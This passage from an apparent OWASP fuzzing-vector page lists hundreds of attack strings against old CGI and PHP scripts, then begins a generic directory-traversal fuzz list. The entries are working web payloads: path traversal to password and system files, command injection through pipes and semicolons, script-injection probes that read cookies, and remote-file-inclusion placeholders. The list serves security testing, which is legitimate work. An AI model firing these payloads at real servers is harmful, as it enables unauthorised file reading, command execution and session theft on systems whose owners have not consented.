alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
